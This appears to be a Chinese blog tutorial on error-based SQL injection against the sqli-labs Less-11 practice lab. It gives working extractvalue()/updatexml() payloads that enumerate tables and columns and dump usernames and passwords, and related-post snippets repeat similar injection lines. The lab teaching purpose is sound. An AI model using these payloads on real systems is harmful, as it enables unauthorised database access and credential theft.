SQL手工盲注 - 报错回显

已于 2024-01-11 21:05:28 修改
阅读量115 收藏 1
点赞数 1
分类专栏: 网络安全入门到入狱的学习笔记 文章标签: sql 数据库 网络安全 安全 网络
于 2023-09-28 18:18:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69655483/article/details/133388172
版权

使用的软件:phpstudy(MySQL5.7.26,PHP5.3.29),sqli-labs靶场,Burp Suite,谷歌浏览器,win11

报错回显用到的函数

updatexml()

extractvalue()

靶场演练 

第一步-判断使用单引号闭合还是双引号闭合

第二步-猜解列名 

第三步-用extractvalue()函数盲注

第四步-查找表名

第五步-查找表内字段

第六步-获取字段内数据

补充

        updatexml()函数

        or

盲注就是在注入的过程中,获取的数据不能显示到前端页面,此时,我们需要利用一些方法进行判断或者尝试,我们称之为盲注,报错回显就是其中的一种

报错回显用到的函数

updatexml()

  • 从目标XML中更改包含所查询值的字符串
  • updatexml(XML_document,XPath_String,new_value);
    • 第一个参数:XML_document 是String格式,为XML文档对象的名称,文中为DOC
    • 第二个参数:XPath_string(Xpath格式字符串)
    • 第三个参数:new_value,String格式,替换查找到的符合条件的数据

extractvalue()

  • 从目标XML中返回包含所查询值的字符串
  • extractvalue(XML_document,XPath_String)
    • 第一个参数:XML_document 是String格式,为XML文档对象的名称,文中为DOC
    • 第二个参数:XPath_String (Xpath格式字符串)

靶场演练 

演练靶场为sqli-labs/Less-11和extractvalue()函数为示范

第一步-判断使用单引号闭合还是双引号闭合

我们用符号('")来判断我们注入点的代码用什么符号闭合的,方便我们后续的注入

uname=zhangsan '" &passwd=123123&submit=Submit

第二步-猜解列名 

猜解列名我们会用到函数order by,在函数后面填写数字来猜解列名

uname=zhangsan' order by 3 --+&passwd=123123&submit=Submit

第三步-用extractvalue()函数盲注

还记得上面讲过extractvalue()函数有两个参数,其中一个是XPath_String (Xpath格式字符串),但我们在基于报错SQL盲注的时候,把参数入XPath格式的地方输入别的格式的方式进行注入

uname=zhangsan' union select 1,extractvalue(1,(select version())) --+&passwd=123123&submit=Submit

 但很显然版本没有完全展示出来,所以我们有用到另一个函数 concat()来让我们的信息显示全

uname=zhangsan' union select 1,extractvalue(1,concat(0x7e,(select version()))) --+&passwd=123123&submit=Submit

 这里的0x7e是十六进制转换成十进制就是波浪号(~)

第四步-查找表名

这一步跟上一步一样在原本输入XPath格式的地方输入我们的SQL注入语句

uname=zhangsan' union select 1,extractvalue(1,concat(0x7e,(select(table_name)from information_schema.tables where table_schema=database()))) --+&passwd=123123&submit=Submit

但很显然这里显示数据在1行以上,所以我们有会用到另一个函数Limit

uname=zhangsan' union select 1,extractvalue(1,concat(0x7e,(select(table_name)from information_schema.tables where table_schema=database()limit 0,1),0x7e)) --+&passwd=123123&submit=Submit

 limit后面的0,1表示,从下标0开始那一位数据,看后面的表名那就把0改成1,以此类推下标

第五步-查找表内字段

从上一个步中找到我们要查询的表(比如users表),在盲注查找表内的字段

uname=zhangsan' union select 1,extractvalue(1,concat(0x7e,(select(column_name)from information_schema.columns where table_name=0x7573657273  limit 0,1),0x7e)) --+&passwd=123123&submit=Submit

 0x7573657273是十六进制改回来就是users,是因为有些注入点只支持十六进制

第六步-获取字段内数据

通过上一步我们可以获取到表里有那些字段,在通过这些字段获取字段内的数据

uname=zhangsan' union select 1,extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password)from users))) --+&passwd=123123&submit=Submit

补充

        updatexml()函数

此函数的盲注方式跟extractvalue()函数一样,但就是多了一个参数而已

updatexml(XML_document,XPath_String,new_value);

uname=zhangsan' union select 1,updatexml(1,concat(0x7e,(select version())),1 ) --+&passwd=123123&submit=Submit

在原本第二参数的位置输入我们的SQL语句进行注入

注意:在第一 第二参数的位置的数字尽可能相同,不相同有时候会报错

        or

我们也可以用or进行注入

'or updatexml(1,concat(0x7e,database()),0)or'
' or extractvalue(1,concat(0x7e,database())) or'

注意:最后的or后面必须要用引号结尾

七弦づ
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web应用安全Sqlserver盲注.pptx
06-19
Sqlserver盲注 Sqlserver盲注 1、SQL盲注 什么是SQL盲注SQL盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注盲注分为三类: 1)基于布尔 SQL 盲注。 2)基于时间的 SQL 盲注。 3)基于报错SQL 盲注。 2、基于布尔的Sqlserver盲注 原理:构造逻辑判断。 方式: 1)非正则匹配注入。 2)like注入。 Sqlserver盲注 2、基于布尔的Sqlserver盲注 非正则匹配注入 可以利用逻辑函数进行判断,常用的函数有left()、len()和substring()函数。 Sqlserver盲注 left():left ( string, n ) 返回从左数共n位的字符串。 string:要截取的字符串。 n:截取的长度。 2、基于布尔的Sqlserver盲注 Sqlserver盲注 substring():substring(string, start, length) 截取字符串一部分并返回。 string:要截取的字符串。
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address端口 效果如下:
vue-quill-editor.7z
08-06
劫持上传图片功能,把图片上传服务器接口后返回图片url回显在富文本上
uni-app 富文本编辑 回显富文本和修改富文本!
11-21
uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!
react-react日期选择器
08-15
react日期选择器 it works better on mobile terminal
SQL注入进阶:掌握布尔盲注和延时注入攻击技巧
weixin_43263566的博客
01-21 3621
SQL注入篇 - 布尔盲注及延时注入
深谈SQL注入(进阶篇:盲注
2301_76251460的博客
04-14 782
SQL盲注
SQL手工注入之sql盲注
weixin_46668901的博客
10-27 1206
你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片.
SQL注入——盲注手工注入】
bosskim的博客
06-13 1192
温故知新,学习sql注入分类
SQL注入盲注(布尔、时间)手工注入和半自动化注入
qq_60463414的博客
08-01 1433
SQL注入盲注(布尔、时间)手工注入和半自动化注入
form-generator 表单设计
11-10
Element UI表单设计,将生成的代码直接运行在基于Element的vue项目中,也可导出JSON表单,使用配套的解析器将JSON解析成真实的表单。 npm i [email protected] npm install [email protected] --save ...
详解element-ui级联菜单(城市三级联动菜单)和回显问题
10-16
主要介绍了详解element-ui级联菜单(城市三级联动菜单)和回显问题,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
sql盲注
weixin_55710577的博客
04-09 7308
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 sql注入--盲注前言一、什么是盲注二、步骤示例1.测试注入点2.测所在数据库长度3. 利用ASCII码猜当前数据库名4.利用ASCII码查询表名5、利用ASCII码查询字段名sql手注所用到的函数总结sqlmap进行sql盲注 前言 靶场环境:sqli-labs-master 第8关 注入攻击的本质:把用户的输入当作代码执行。 其中存在两个关键条件: (1)用户可以控制输入。 (2)用户的输入被拼接到原代码上被执行。 提示:以下是本篇.
SQL 盲注 实验
m0_63645854的博客
04-10 335
通过手工 SQL 盲注分别完成 DVWA 的 Low,Medium,High 级别的 SQL 盲注实验。在文本框输入1' and 1=2#,不能正常访问数据,注入点为字符型。第一个字符为d,按照上一步的方法,逐个猜解出整个数据库名:dvwa。拦截数据包后,第一个数据包正常放行,修改第二个数据包,在。DVWA 的 Medium 级别的 SQL 盲注实验。按照上一步的方法,逐个猜解出整个数据库名:dvwa。按照上一步的方法,逐个猜解出整个数据库名:dvwa。(4)确认当前数据库名的第一个字符。
SQL手工盲注报错注入
5L2g556F5ZWl77yf
07-21 1070
报错注入,利用数据库某些机制,人为制造错误,使得注入结果都在错误信息中回显,一般在联合注入受限情况下使用;一般存在页面没有显示位,但是sql语句错误有错误输出的地方 sql盲注SQL Injection Blind),和普通的注入原理一样,不同之处是注入后数据库和后台不回回显回显有限的信息; 通常只能通过 “是”;“否”,反应速度的 “快”;“慢”,来判断。......
SQL手工注入探索旅程(一)
Louisnie
09-30 9295
SQL注入漏洞原理 由于程序没有过滤用户的输入,攻击者通过向服务器提交恶意的SQL查询语句,应用程序接收后错误的将攻击者的输入作为原始的SQL查询语句的一部分执行,导致改变了程序原始的SQL查询逻辑,额外的执行了攻击者构造的SQL查询语句 实验环境: kali:192.168.128.128/24 metasploit:192.168.128.129/24 我们首先看一段很简单的PHP代码查询数据...
WEB安全实战(一)SQL盲注
热门推荐
紫羽风的博客
10-30 3万+
前言 好长时间没有写过东西了,不是不想写,只不过是一直静不下心来写点东西。当然,拖了这么长的时间,也总该写点什么的。最近刚刚上手安全方面的东西,作为一个菜鸟,也本着学习的目的,就谈谈最近接触到的安全方面的问题吧。 背景 既然提到了背景,那我们就简单的带一下,最近互联网上爆出了各种惊人的事件、各种门、各种照的,归根结底,都是网络安全出的问题,有的是网络被别人监控
DVWA sql盲注手工
永不垂头的博客
08-03 371
学习笔记—DVWA sql盲注手工 一、dvwa 低sql盲注手工 1’and ascii(substr(database(),2,1))>'97 exists 1’and ascii(substr(database(),2,1))<'122 exists 1’and ascii(substr(database(),2,1))<'119 exists 1’and ascii(substr(database(),2,1))<'118 MISSING 1’and ascii(subs
oracle sql monitor简单使用说明
最新发布
雅冰石的专栏
04-26 320
activity活动这里显示时间大多花在了哪里。
el-tree-select回显失败
12-22
el-tree-select回显失败可能是由于以下原因导致的: 1. 数据绑定问题:确保你的绑定数据是使用ref或reactive进行绑定的。如果没有使用ref或reactive,请参考Vue 3官方文档进行修改。 2. 元素区域超出问题:如果在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值